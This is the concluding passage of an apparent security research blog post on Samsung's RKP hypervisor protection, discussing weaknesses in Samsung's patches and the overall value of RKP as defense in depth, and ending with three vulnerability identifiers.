before writing to the address, but it only fixes the exploitation paths and not the root cause. It is possible that in the future, when a new command handler is added, the physmap
check is forgotten and the vulnerability is thus reintroduced. Furthermore, the patch also assumes that memory that is read-only from the kernel will never be marked as FREE
. While this holds true for now, it might change in the future as well.
A better solution would have been to add a flag denoting to check for read or write access as an argument to the virt_to_phys_el1
function.
In this conclusion, we would like to give you our thoughts about Samsung RKP and its implementation as of early 2021.
With regards to the implementation, the codebase has been around for a few years already, and it shows. Complexity increased as new features were added, and bug patches had to be made here and there. This might explain how mistakes like the ones revealed today could have been made and why configuration issues happen so frequently. It is very likely that there are other bugs lurking in the code that we have glossed over. In addition, we feel that Samsung has made some strange choices, both in the design process and in their bug patches. For example, duplicating information that is already in the stage 2 page tables (for example, the S2AP
bit and the ro_bitmap
) is very error-prone. They also seem to be patching specific exploitation paths instead of the root cause of vulnerabilities, which is kind of a red flag.
Leaving these flaws aside for a moment and considering the overall impact of Samsung RKP on device security, we believe that it does contribute a little bit to making the device more secure as a defense-in-depth measure. It makes it harder for an attacker to achieve code execution in the kernel. However, it is certainly not a panacea. When writing an Android kernel exploit, an attacker will need to find an RKP bypass (which is different from a vulnerability in RKP) to compromise the system. Unfortunately, there are known bypasses that still need to be addressed by Samsung.
SVE-2021-20178
SVE-2021-20179
SVE-2021-20176
Copyright © Impalabs 2021-2023